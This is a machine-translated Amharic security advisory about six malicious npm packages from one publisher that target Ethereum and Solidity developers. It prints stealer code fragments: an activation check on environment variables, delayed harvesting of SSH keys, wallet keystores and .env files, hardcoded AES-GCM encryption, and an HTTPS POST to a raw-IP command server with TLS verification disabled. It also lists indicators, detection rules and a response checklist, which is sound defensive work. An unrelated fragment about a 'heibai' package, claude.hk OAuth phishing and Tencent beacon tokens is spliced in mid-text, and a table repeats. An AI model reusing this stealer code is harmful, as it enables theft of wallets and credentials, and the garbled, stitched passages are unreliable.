TL; DR
በግንቦት 6፣ 2026፣ አንድ ነጠላ npm አሳታሚ፣ namikazesarada010206, የኢቴሬም፣ የሶሊቲቲ እና የዴፋይ ገንቢ ሥነ-ምህዳርን ኢላማ ያደረጉ ስድስት ተንኮል አዘል ፓኬጆችን ገፋ።
ፓኬጆቹ፣ viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, እና web3-utils-core, ለታዋቂ የWeb3 መሳሪያዎች እንደ አጋዥ ቤተ-መጻሕፍት እንዲመስሉ የተነደፉ አሳማኝ ስሞችን ተጠቅሟል።
ስድስቱም ፓኬጆች ተመሳሳይ ይዘት ነበራቸው telemetry.js ፋይል። ፋይሉ በክላስተሩ ውስጥ በባይት-ተመሳሳይ ነበር፣ SHA-256 ያለው፡
ማልዌር በተጫነበት ጊዜ አይሰራም። ምንም አይነት preinstall or postinstall መንጠቆ። በምትኩ፣ ፓኬጁ ከውጭ ሲገባ ያነቃቃል require().
ያ ዝርዝር ጉዳይ አስፈላጊ ነው።
ተከላው አንድ ገንቢ ጥቅሉን በትክክል እስኪጠቀም ድረስ ይጠብቃል። ከዚያም የሥራ ቦታው እውነተኛ የኢቴሬም/የሶሊቲ ልማት አካባቢ መሆኑን ያረጋግጣል። የአልኬሚ ወይም የኢንፉራ ቁልፎችን፣ የግል ቁልፎችን፣ የማኒሞኒክስ መሳሪያዎችን፣ የማሰማሪያ ቁልፎችን ወይም የአካባቢውን የፋውንድሪ ማውጫ ይፈልጋል።
አስተናጋጁ የሚዛመድ ከሆነ፣ ሌባው የSSH የግል ቁልፎችን፣ የፋውንድሪ / ጌት / የብራውኒ የኪስ መሸጫ ሱቆችን ይሰበስባል፣ .env* ፋይሎች እና ሚስጥራዊ የአካባቢ ተለዋዋጮች። ጥቅሉን በጠንካራ ኮድ የተለጠፈ የይለፍ ሐረግ በመጠቀም በAES-256-GCM ያመሰጥረዋል እና የTLS ማረጋገጫ ተሰናክሎ ወደ ጥሬ IPv4 C2 የመጨረሻ ነጥብ ያወጣዋል።
የXygeni የማልዌር ቅድመ ማስጠንቀቂያ (MEW) ስርዓት ስድስቱንም ፓኬጆች ተንኮል አዘል እንደሆኑ አረጋግጧል። የnpm መዝገብ ቤት የማውረድ ሪፖርት ጥቅል በመጠባበቅ ላይ ነው።
ክላስተር፡ ስድስት ፓኬጆች፣ አንድ አሳታሚ
የአሳታሚው መለያ namikazesarada010206 ካልተረጋገጠው የጂሜይል አድራሻ ጋር ተገናኝቷል namikazesarada010206@gmail.com.
ዘመቻው ግንቦት 6፣ 2026 የአንድ ቀን ህትመት እንደተጀመረ ታየ። ስድስቱም ፓኬጆች እንደ እትም ተቀርጸዋል። 1.0.0, ዜሮ የሩጫ ጊዜ ጥገኝነቶች ነበሩት፣ እና ሶስት ፋይሎች ብቻ ተልከዋል፡
package.json index.js telemetry.js እንዲሁም ተመሳሳይ የምንጭ ማከማቻ አውጀዋል፡
https://github.com/harunosakura030303-maker/evmchain-config የመጀመሪያዎቹ ሶስት ፓኬጆች በመጀመሪያው ህትመት ላይ በMEW ስካነሮች ተይዘዋል። የቀሩት ሦስቱ የአሳታሚውን npm መገለጫ ተንታኝ ከገመገመ በኋላ በኃይል ምልክት ተደርጎባቸዋል። በአንድ ወቅት ተመሳሳይ ባይት-ተመሳሳይ telemetry.js በክላስተር ውስጥ በሙሉ ተረጋግጧል፣ ወጥነት ባለው መልኩ ተንኮል አዘል እንደሆኑ ተዘግተዋል።
| ጥቅል | ትርጉም | npm ታትሟል | የMEW ቲኬት | ዉሳኔ |
|---|---|---|---|---|
| ቪም-ኮር | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | ተንኮል አዘል |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | ተንኮል አዘል |
| hardhat-core-utils | 1.0.0 | 2026-05-06 | #51051 | ተንኮል አዘል |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | ተንኮል አዘል፣ ወጥነት ባለው መልኩ |
| የፋውንድሪ-ዩቲሊቲዎች | 1.0.0 | 2026-05-06 | #51071 | ተንኮል አዘል፣ ወጥነት ባለው መልኩ |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | ተንኮል አዘል፣ ወጥነት ባለው መልኩ |
የስያሜ ስትራቴጂው ቀላል ግን ውጤታማ ነው።
እነዚህ ፓኬጆች ትክክለኛ የላይፍ ስሞችን አያስመስሉም። በምትኩ፣ እንደ -core, -utils, እና -utils-coreይህም አንድ ገንቢ በWeb3 የመሳሪያ መሳሪያዎች አቅራቢያ ሊያያቸው የሚችላቸው ተጓዳኝ ቤተ-መጻሕፍት እንዲመስሉ ያደርጋቸዋል።
| ተንኮል አዘል ጥቅል | ሕጋዊ ኢላማ |
|---|---|
| ቪም-ኮር | ቪኤም፣ ታዋቂ የ Ethereum TypeScript ደንበኛ |
| viem-utils-core | ቪም |
| hardhat-core-utils | ሃርድሃት፣ ዋና የጠንካራነት ልማት አካባቢ |
| evm-utils | አጠቃላይ የEVM የመሳሪያ ስም ቦታ |
| የፋውንድሪ-ዩቲሊቲዎች | የማምረቻ ፋብሪካ፣ የጠንካራነት መሣሪያ ሰንሰለት |
| web3-utils-core | web3-utils፣ Web3.js አጋዥዎች |
ይህ "ተጨማሪ ፓኬጅ" ንድፍ ነው፡ "እኔ እውነተኛ ፓኬጅ ነኝ" ሳይሆን "በእውነተኛ ፓኬጅ ዙሪያ ምክንያታዊ ረዳት እመስላለሁ"።
ለዴፋይ ገንቢዎች በፍጥነት ለሚንቀሳቀሱ፣ ይህ አደጋ ለመፍጠር በቂ ነው።
ፓኬጁ ከውጭ ሲገባ ምን ይከሰታል
የጥቃት ሰንሰለቱ ትንሽ፣ ሆን ተብሎ የተደረገ እና በክሪፕቶ ልማት አካባቢዎች ላይ ያተኮረ ነው።
የመጫኛ መንጠቆ የለም። በምትኩ፣ እያንዳንዱ ጥቅል የሚከተሉትን ያካትታል index.js የስታብ ተግባርን ወደ ውጭ ይልካል እና ከዚያም ተንኮል አዘል የቴሌሜትሪ ሞጁሉን ይጭናል።
require('./telemetry').init(); ይህ ማለት ማልዌር ለመጀመሪያ ጊዜ ሲገባ ይነቃቃል ማለት ነው።
ይህ ለአጥቂው በአሠራር ረገድ ጠቃሚ ነው። ብዙ ስካነሮች እና የአሸዋ ሳጥኖች በመጫኛ ጊዜ ባህሪ ላይ ያተኩራሉ። ይህ ጥቅል በገንቢ፣ በግንባታ ስክሪፕት፣ በሙከራ ስብስብ ወይም በአሂድ ጊዜ መንገድ በትክክል እስኪጠቀምበት ድረስ ይጠብቃል።
የማግበር በር፡ በእውነተኛ የድር3 ገንቢ የስራ ጣቢያዎች ላይ ብቻ እሳት
የመትከያው በጣም አስፈላጊው ክፍል የማግበር በር ነው።
ማልዌር በኤቲሬም / ሶሊቲቲ ዴቨሎፐር ማሽኖች ላይ በተለምዶ የሚገኙትን የአካባቢ ተለዋዋጮች ይፈትሻል፡
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); እንዲሁም ፋውንድሪ የተጫነ መስሎ ይታይ እንደሆነ ያረጋግጣል፦
fs.existsSync(path.join(os.homedir(), '.foundry')) ሁለቱም ሁኔታዎች እውነት ካልሆኑ፣ ተግባሩ ይመለሳል እና ምንም አያደርግም።
ይህ ጥቅሉን በአጠቃላይ የትንታኔ አካባቢዎች ጸጥ ያደርገዋል። የፋውንድሪ፣ የአልኬሚ ቁልፎች፣ የኢንፉራ ቁልፎች፣ የግል ቁልፎች ወይም የማኒሞኒክስ ምልክቶች የሌሉት የአሸዋ ሳጥን ምንም ጉዳት የሌለው የሚመስል ጠቀሜታ ሊያሳይ ይችላል።
በተዛማጅ አስተናጋጅ ላይ፣ ማልዌር ከመሰብሰቡ በፊት ከ60 እስከ 90 ሰከንዶች ይጠብቃል፡
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); መዘግየቱ በማስመጣት እና በማውጣት መካከል ያለውን ግልጽ ትስስር ይቀንሳል። .unref() ጥሪው ፓኬጁ በአጭር ጊዜ ስክሪፕት ውስጥ ከገባ የአስተናጋጁ ሂደት በመደበኛነት እንዲወጣ ያስችለዋል።
ይህ ጫጫታ የሚፈጥር የማጭበርበሪያ ባህሪ አይደለም። የገንቢው አካባቢ መስረቅ ተገቢ ካልሆነ በስተቀር ከመሮጥ ለመቆጠብ የተነደፈ የታለመ ሌባ ነው።
ሌባው የሚሰበስበው ነገር
የማግበሪያው በር ካለፈ በኋላ፣ ማልዌር በWeb3 ልማት ውስጥ በጣም አስፈላጊ ከሆኑ ምንጮች ይሰበስባል፡ የግል ቁልፎች፣ የኪስ ቦርሳ ቁልፍ መደብሮች፣ የማሰማሪያ ምስክርነቶች፣ የደመና ምስጢሮች፣ የnpm ቶከኖች እና የአካባቢ ፕሮጀክት ውቅር።
| ምንጭ | ምን ይሰበሰባል? |
|---|---|
| process.env | ማንኛውም ተለዋዋጭ ማዛመጃ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | PRIVATE KEY ወይም BEGIN OPENSSH የያዙ ፋይሎች፣ ሙሉ የፋይል ይዘትን ጨምሮ |
| ~/.ፋውንዴሪ/ኪስቶሮች/* | የፋውንድሪ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች |
| ~/.ethereum/keystore/* | የጌት የኪስ መሸጫ ፋይሎች |
| ~/.ብራውኒ/አካውንቶች/* | የብራውኒ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች |
| ${cwd}/.env | ሙሉ የፋይል ይዘት |
| ${cwd}/.env.local | ሙሉ የፋይል ይዘት |
| ${cwd}/.env.production | ሙሉ የፋይል ይዘት |
| ${cwd}/.env.development | ሙሉ የፋይል ይዘት |
| የ os.hostname() | የአስተናጋጅ ሜታዳታ |
| ክሪፕቶ.በዘፈቀደUUID() | የተጎጂ/የክፍለ ጊዜ መለያ |
| ቀን.አሁን() | የስብስብ የጊዜ ማህተም |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com የATTA ቶከኖች የሚከተሉት ናቸው፡
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 ቴሌሜትሪው የኦፕሬተሩ የራሱ ትንታኔ ወይም የተለየ የገንዘብ ድጋፍ የሚደረግለት ቻናል መሆኑን ማረጋገጥ አልቻልንም። የATTA ቶከኖች በመረመርናቸው ሁለቱም ናሙናዎች ውስጥ አንድ አይነት ናቸው።
ክላስተር ቢ፡ ሄይባይ
claude.hk OAuth ፊሺንግ + ANTHROPIC_BASE_URL ጠለፋ
የኤፕሪል 1 ናሙና የዘመቻው ቀዳሚ ክንድ የበለጠ ጨካኝ ነው።
heibai:2.1.88-claude.hk-4 የታተመው በ wuguoqiangvip28, አንድ መለያ የተፈጠረው ሰኔ 7፣ 2025 ነው። ፓኬጁ እራሱን ከህጋዊው ጋር በግልጽ አዛብቶታል። 2.1.88 አንትሮፒክ ልቀት።
ከCA-cert MITM ጋር አይገናኝም። በምትኩ፣ ለተጠቃሚው ስለ OAuth የመጨረሻ ነጥብ ይዋሻል።
በተለቀቀው የክላውድ ኮድ ምንጭ ላይ የተጨመሩት ተንኮል አዘል ተጨማሪዎች የሚከተሉትን ያካትታሉ፡
| ምንጭ | ምን ይሰበሰባል? |
|---|---|
| process.env | ማንኛውም ተለዋዋጭ ማዛመጃ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | PRIVATE KEY ወይም BEGIN OPENSSH የያዙ ፋይሎች፣ ሙሉ የፋይል ይዘትን ጨምሮ |
| ~/.ፋውንዴሪ/ኪስቶሮች/* | የፋውንድሪ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች |
| ~/.ethereum/keystore/* | የጌት የኪስ መሸጫ ፋይሎች |
| ~/.ብራውኒ/አካውንቶች/* | የብራውኒ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች |
| ${cwd}/.env | ሙሉ የፋይል ይዘት |
| ${cwd}/.env.local | ሙሉ የፋይል ይዘት |
| ${cwd}/.env.production | ሙሉ የፋይል ይዘት |
| ${cwd}/.env.development | ሙሉ የፋይል ይዘት |
| የ os.hostname() | የአስተናጋጅ ሜታዳታ |
| ክሪፕቶ.በዘፈቀደUUID() | የተጎጂ/የክፍለ ጊዜ መለያ |
| ቀን.አሁን() | የስብስብ የጊዜ ማህተም |
የታለመው ዝርዝር በጣም ልዩ ነው። ይህ አጠቃላይ የአሳሽ ስርቆት ወይም ሰፊ የምስክርነት ማጭበርበሪያ አይደለም። የኤቴሬም መተግበሪያዎችን ለሚገነቡ፣ ለሚሞክሩ፣ ለሚያሰማሩ ወይም ለሚያካሂዱ ገንቢዎች የታለመ ነው።
የፋውንድሪ፣ የጌት እና የብራውኒ ቁልፍ መደብሮችን ማካተት በተለይ አስፈላጊ ነው። እነዚህ ፋይሎች ወደ ቦርሳዎች ወይም የማሰማሪያ ማንነቶች ቀጥተኛ መዳረሻን ሊወክሉ ይችላሉ። አጥቂው ከይለፍ ቃላት፣ ከማስታወሻዎች ወይም ከአካባቢ ምስጢሮች ጋር ማጣመር ከቻለ፣ ገንዘብ ማዛወር፣ አሰማሪዎችን ማስመሰል ወይም ብልጥ የኮንትራት ስራዎችን ማበላሸት ይችሉ ይሆናል።
ከማጣራት በፊት ኢንክሪፕሽን
ማልዌር የተሰበሰበውን መረጃ ከመላክዎ በፊት ኢንክሪፕት ያደርጋል።
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); ጠንካራ ኮድ የተደረገበት የይለፍ ቃል የሚከተለው ነው፦
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d የመጨረሻው የክፍያ ጭነት እንደ JSON ተጠቅልሏል፡
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} ኢንክሪፕሽን ማልዌርን በራሱ የበለጠ የላቀ አያደርገውም። ሆኖም ግን፣ የአውታረ መረብ ፍተሻን አስቸጋሪ ያደርገዋል። መውጣትን የሚመለከት ተከላካዩ የJSON ክፍያ ጭነት ያያል፣ ነገር ግን የተሰረቁ ቁልፎችን፣ የኪስ ቦርሳ ፋይሎችን ወይም .env ያለ ጠንካራ ኮድ የተቀመጠው የይለፍ ሐረግ እና ዲክሪፕት ሎጂክ ይዘቶች።
ወደ ጥሬ IPv4 C2 ማጣሪያ
የማጣሪያ መንገዱ በጥብቅ ኮድ የተለጠፈ ነው፦
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); ማልዌር ውሂብ ይልካል ወደ፦
https://76.13.37.80:8443/api/v1/telemetry ሁለት ዝርዝሮች ጎልተው ይታያሉ።
በመጀመሪያ፣ C2 ከዶሜይን ይልቅ ጥሬ የአይፒቪ4 አድራሻ ነው። ይህም የጎራ ምዝገባን አስፈላጊነት ያስወግዳል እና አንዳንድ በጎራ ላይ የተመሰረቱ ግኝቶችን ያስወግዳል።
ሁለተኛ፣ የTLS ማረጋገጫ በሚከተለው ተሰናክሏል፦
rejectUnauthorized: false ይህ ተንኮል አዘል ዌር ማንኛውንም የምስክር ወረቀት እንዲቀበል ያስችለዋል፣ ይህም የራስ-የተፈረሙ የምስክር ወረቀቶችን ጨምሮ። በሌላ አነጋገር፣ አጥቂው ትክክለኛ የህዝብ የምስክር ወረቀት ሳያስፈልገው የተመሰጠረ ትራንስፖርት ያገኛል።
የድጋሚ ሙከራ አመክንዮ እና የfallback አስተናጋጅ የለም። ስህተቶች በጸጥታ ይዋጣሉ። ይህ C2 ከመስመር ውጭ ከሆነ ወይም ሊደረስበት የማይችል ከሆነ ጥቅሉን ጸጥ ያደርገዋል።
ይህ ዘመቻ ለምን አስፈላጊ ነው?
ገንቢዎች ሰፊ ምስክርነቶችን ለማሳደድ የታለሙ አብዛኛዎቹ ተንኮል አዘል የnpm ፓኬጆች፡ npm tokens፣ AWS keys፣ GitHub tokens፣ ወይም .npmrc ፋይሎችን.
ይህ ዘመቻ ኢላማውን ያጠባል።
ማሽኑ የኤቴሬም ወይም የሶሊቲ ገንቢ መሆኑን የሚያሳዩ ምልክቶችን ይፈልጋል። ከዚያም በዚያ አካባቢ ውስጥ አስፈላጊ የሆኑትን ንብረቶች በትክክል ይጎትታል፡ የኪስ ቦርሳ ቁልፍ መደብሮች፣ የግል ቁልፎች፣ ማኒሞኒክስ፣ የማሰማሪያ ቁልፎች፣ .env ፋይሎች እና የSSH ቁልፎች።
ይህ ዘመቻውን ለWeb3 ቡድኖች ከአጠቃላይ npm ሌባ ይልቅ አደገኛ ያደርገዋል።
የተሳካ ኢንፌክሽን የሚከተሉትን ሊያሳይ ይችላል፦
- የማሰማሪያ ቦርሳዎች
- ስማርት የኮንትራት አስተዳዳሪ ቁልፎች
- የ RPC አቅራቢ ቁልፎች
- የደመና ማሰማራት ምስክርነቶች
- የnpm ህትመት ቶከኖች
- የSSH መዳረሻ ለገንቢ ወይም ለግንባታ መሠረተ ልማት
- የፕሮጀክት ምስጢሮች የተከማቹት በ
.envፋይሎች - ለፋውንድሪ፣ ለጌት ወይም ለብራውኒ የኪስ ቦርሳዎች
የጥቅሉ ስሞችም ግልጽ የሆነ የማህበራዊ ምህንድስና ያሳያሉ። የWeb3 ገንቢ ሥነ-ምህዳርን በታወቁ የመሳሪያ ስሞች ያነጣጠሩ ናቸው፡ viem, hardhat, foundry, evm, እና web3.
ተዋናዩ እውነተኛ ፕሮጀክቶችን ማቃለል አያስፈልገውም። ምክንያታዊ የሆነ ተጓዳኝ ፓኬጅ የሚመስል ነገር ለመጫን ገንቢ ብቻ ነው የሚያስፈልጋቸው።
የመደራደር እና የመለየት አመላካቾች
| ፓኬጆች እና አሳታሚ | |
|---|---|
| መስክ | ዋጋ |
| የኤንፒኤም አሳታሚ | namikazesarada010206 |
| የአሳታሚ ኢሜይል | namikazesarada010206@gmail.com |
| ኢሜል ተረጋግጧል | አይ |
| SCM ተረጋግጧል | አይ |
| የዝና ውጤት | 1.0 |
| ጥቅሎች | viem-core፣ viem-utils-core፣ hardhat-core-utils፣ evm-utils፣ foundry-utils፣ web3-utils-core |
| ስሪቶች | ሁሉም 1.0.0 |
| የምንጭ ማከማቻ | https://github.com/harunosakura030303-maker/evmchain-config |
| ተንኮል አዘል መሆኑ ተረጋግጧል | ስድስቱም ፓኬጆች በሙሉ |
| አውታረ መረብ | |
|---|---|
| ዓይነት | ዋጋ |
| የC2 የመጨረሻ ነጥብ | https://76.13.37.80:8443/api/v1/telemetry |
| C2 አይፒ | 76.13.37.80 |
| የC2 ወደብ | 8443/tcp |
| የTLS ባህሪ | refuseUnauthorized: ሐሰት |
| የክፍያ ጭነት ንድፍ | {"v":2,"iv": "d": "ት": } |
| ፋይሎች እና ሃሾች | |
|---|---|
| ዓይነት | ዋጋ |
| ቴሌሜትሪ.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| የጥቅል አቀማመጥ | package.json, index.js, telemetry.js |
| የፋይል ብዛት | 3 |
| ግምታዊ ጠቅላላ መጠን | 3.4 ኪባ |
የማግበር ምልክቶች
ማልዌር እነዚህን የአካባቢ ተለዋዋጮች ይፈትሻል፦
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY እንዲሁም የሚከተሉትን ይፈትሻል፦
~/.foundry/ የታለሙ የአስተናጋጅ መንገዶች
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development የሬጅክስ ስብስብ
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i የክትትል ማስታወሻዎች
ሙሉ የባህሪ ትንተና ሳያስፈልግ ይህንን ዘመቻ የሚመለከቱ በርካታ ህጎች አሉ።
በመጀመሪያ፣ የስድስቱን ተንኮል አዘል የጥቅል ስሞች ለማግኘት የመቆለፊያ ፋይሎችን ይቃኙ፦
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ማንኛውም ተዛማጅ በ package-lock.json, yarn.lock, pnpm-lock.yaml, ወይም node_modules ታሪክ እንደ ከባድ ክስተት መታየት አለበት።
ሁለተኛ፣ የNode.js የኪስ ቦርሳ ቁልፍ ማከማቻ መንገዶችን የሚያነብ ሂደትን መከታተል፡
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ ይህ እንደ አጋዥ ጥገኝነት ከገባ ፓኬጅ ጋር በተያያዘ አልፎ አልፎ ህጋዊ ባህሪ ነው። በተለይም ወደ ውጭ የሚወጣ የአውታረ መረብ እንቅስቃሴ ሲከተል አጠራጣሪ ነው።
ሶስተኛ፣ በሚከተሉት የHTTPS ግንኙነቶች ላይ አግድ ወይም አሳውቅ፦
76.13.37.80:8443 በተለይም የጥያቄው መንገድ የሚከተለው ከሆነ፦
/api/v1/telemetry አራተኛ፣ እነዚህን ባህሪያት የሚያጣምሩ የnpm ፓኬጆችን ይፈልጉ፡
- አዲስ ወይም ዝቅተኛ ስም ያለው አታሚ
- ያልተረጋገጠ የጂሜይል መለያ
- ከWeb3 አጠገብ ያለው የጥቅል ስም
- ትርጉም ያለው የማከማቻ ታሪክ የለም
- የትንሽ ጥቅል አቀማመጥ
index.jsየቴሌሜትሪ ወይም የረዳት ፋይል የሚጭን- ምንም የሩጫ ጊዜ ጥገኝነቶች የሉም
- ስሜታዊ አካባቢ-ተለዋዋጭ ስብስብ
- የኪስ ቦርሳ ቁልፍ መደብር መዳረሻ
ይህ ንድፍ ከአንድ ነጠላ IOC የበለጠ ጠቃሚ ነው ምክንያቱም የሚቀጥለው ጥቅል የአይፒ አድራሻውን ሊለውጥ ይችላል ነገር ግን ተመሳሳይ የዒላማ አመክንዮ ሊኖረው ይችላል።
የመደራደር ምላሽ ዝርዝር
አንድ ገንቢ ከስድስቱ ፓኬጆች ውስጥ አንዱን ከተጠቀመ እና አካባቢው ከማግበር በር ጋር የሚዛመድ ከሆነ፣ የስራ ቦታውን እንደተጎዳ አድርገው ይቁጠሩት።
ይህም የፋውንድሪ የተጫኑ ማሽኖችን፣ በአካባቢ ውስጥ ያሉ የአልኬሚ ወይም የኢንፉራ ቁልፎችን፣ የግል ቁልፎችን፣ የማስታወሻ መሳሪያዎችን ወይም የማሰማሪያ ቁልፎችን ያካትታል።
የሚመከር ምላሽ፡
- አስተናጋጁን ከአውታረ መረቡ ያላቅቁ።
- ጠብቅ
node_modules፣ የመቆለፊያ ፋይሎች፣ የሼል ታሪክ እና ለፎረንሲክ ጥናት ተዛማጅ ምዝግብ ማስታወሻዎች። - እያንዳንዱን የSSH ቁልፍ ጥንድ ከስር ያሽከርክሩ
~/.ssh/. - ለእያንዳንዱ የቁልፍ መደብር የኪስ ቦርሳ ቁልፎችን ያሽከርክሩ
~/.foundry,~/.ethereum, እና~/.brownie. - ገንዘቦችን ወደ አዲስ የኪስ ቦርሳዎች ያስተላልፉ።
- የተከማቸውን እያንዳንዱን ሚስጥር ያሽከርክሩ
.env*ገንቢው የሰራባቸው ማከማቻዎች ውስጥ ያሉ ፋይሎች። - ከስብስብ ሬጅክስ ጋር የሚዛመዱ የአካባቢ ምስጢሮችን ያሽከርክሩ፣ ይህም የAWS ቁልፎችን፣ የnpm ቶከኖችን፣ የማስታወቂያ ቶከኖችን፣ የኤፒአይ ቁልፎችን፣ የግል ቁልፎችን፣ ዘሮችን እና የማስታወሻ ደብተሮችን ያካትታል።
- ፓኬጁ ለመጀመሪያ ጊዜ ከተጫነበት ጊዜ ጀምሮ የኦዲት ክላውድ፣ npm፣ GitHub፣ RPC አቅራቢ እና የblockchain እንቅስቃሴ።
- እንደገና ጥቅም ላይ ከመዋሉ በፊት የስራ ቦታውን እንደገና ምስል ይስሩ።
ተከላካዮች ምን መውሰድ አለባቸው
ይህ ዘመቻ የ npm የፊደል አጻጻፍ በከፍተኛ ዋጋ ባላቸው የገንቢ ሥነ-ምህዳሮች ዙሪያ እንዴት እየተለወጠ እንዳለ ያሳያል።
ተዋናይው ጽናት አላስፈለገውም። ግርግር አያስፈልጋቸውም ነበር። የመጫኛ ጊዜ እንኳን አፈጻጸም አያስፈልጋቸውም ነበር።
በምትኩ፣ በሦስት ነገሮች ላይ ይተማመኑ ነበር፡
- ሊሆኑ የሚችሉ የWeb3 ጥቅል ስሞች
- ማግበር በእውነተኛ የክሪፕቶ-ልማት ማሽኖች ላይ ብቻ
- ለኤቲሬም ገንቢዎች በጣም አስፈላጊ የሆኑትን ፋይሎች እና ምስጢሮች በቀጥታ መስረቅ
ይህ ዘመቻው በሰፊው ቅኝት በቀላሉ እንዳይታለፍ እና በትክክለኛው አካባቢ ሲደርስ አደገኛ ያደርገዋል።
ለWeb3 ቡድኖች፣ ትምህርቱ ግልጽ ነው፡ የጥገኝነት ስሞችን እንደ የስጋት ሞዴልዎ አካል አድርገው ይቁጠሩ። ምንም ጉዳት የሌለው ረዳት የሚመስል ጥቅል አሁንም የኪስ ቦርሳ ስምምነት ለማድረግ አጭሩ መንገድ ሊሆን ይችላል።
ለnpm መዝገብ ቤት ሪፖርት ተደርጓል። የአታሚው መለያ እና ፓኬጆች ሲወገዱ ይህንን ልጥፍ እናዘምነዋለን።




